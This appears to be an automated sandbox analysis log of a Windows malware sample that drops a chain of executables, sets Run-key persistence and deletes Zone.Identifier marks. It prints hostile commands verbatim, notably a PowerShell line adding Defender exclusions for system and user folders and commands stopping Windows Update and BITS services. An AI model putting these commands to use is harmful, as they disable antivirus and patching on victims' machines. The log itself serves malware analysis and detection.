Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Users\user\AppData\Local\Temp\2658326577.exe C:\Users\user\AppData\Local\Temp\2658326577.exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Process created: C:\Users\user\AppData\Local\Temp\4BBF.exe "C:\Users\user\AppData\Local\Temp\4BBF.exe"
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Process created: C:\Users\user\AppData\Local\Temp\71384504.exe C:\Users\user\AppData\Local\Temp\71384504.exe
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Process created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Users\user\AppData\Local\Temp\2355412914.exe C:\Users\user\AppData\Local\Temp\2355412914.exe
Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Users\user\AppData\Local\Temp\2658326577.exe C:\Users\user\AppData\Local\Temp\2658326577.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: msi.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Section loaded: ntmarta.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: apphelp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: wininet.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: iertutil.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: srvcli.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: netutils.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: windows.storage.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: wldp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: uxtheme.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: propsys.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: profapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: edputil.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: sspicli.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: wintypes.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: appresolver.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: slc.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: userenv.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: sppc.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: winhttp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: mswsock.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: winnsi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: napinsp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: wshbth.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: nlaapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: dnsapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: winrnr.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: firewallapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: fwbase.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: cryptsp.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: rsaenh.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: wininet.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: iertutil.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: srvcli.dll
Source: C:\Windows\sysppvrdnvs.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: thcdVit1dX.exe | Static file information: File size 1390680 > 1048576
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: thcdVit1dX.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdbA | source: thcdVit1dX.exe
Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdb | source: thcdVit1dX.exe
Source: thcdVit1dX.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: thcdVit1dX.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: thcdVit1dX.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: thcdVit1dX.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: thcdVit1dX.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: initial sample | Static PE information: section where entry point is pointing to: .zero
Source: thcdVit1dX.exe | Static PE information: section name: .didat
Source: thcdVit1dX.exe | Static PE information: section name: .wixburn
Source: thcdVit1dX.exe | Static PE information: section name: .zero
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00476973 push ecx; ret 0_2_00476986
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Code function: 2_2_00C91A31 push ecx; ret 2_2_00C91A44

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Executable created and started: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | File created: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Temp\4BBF.exe
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | File created: C:\Users\user\AppData\Local\Temp\71384504.exe
Source: C:\Windows\sysppvrdnvs.exe | File created: C:\Users\user\AppData\Local\Temp\2355412914.exe
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe
Source: C:\Windows\sysppvrdnvs.exe | File created: C:\Users\user\AppData\Local\Temp\2658326577.exe
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | File created: C:\Windows\sysppvrdnvs.exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Temp\Setup_20241026012616_Failed.log

Boot Survival

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\sysppvrdnvs.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\thcdVit1dX.exe | File opened: C:\Users\user\AppData\Local\Temp\4BBF.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | File opened: C:\Users\user\AppData\Local\Temp\71384504.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | File opened: C:\Users\user\AppData\Local\Temp\71384504.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe | File opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe | File opened: C:\Users\user\AppData\Local\Temp\651713841.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe | File opened: C:\Users\user\AppData\Local\Temp\1863518468.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe | File opened: C:\Users\user\AppData\Local\Temp\2355412914.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysppvrdnvs.exe | File opened: C:\Users\user\AppData\Local\Temp\2658326577.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
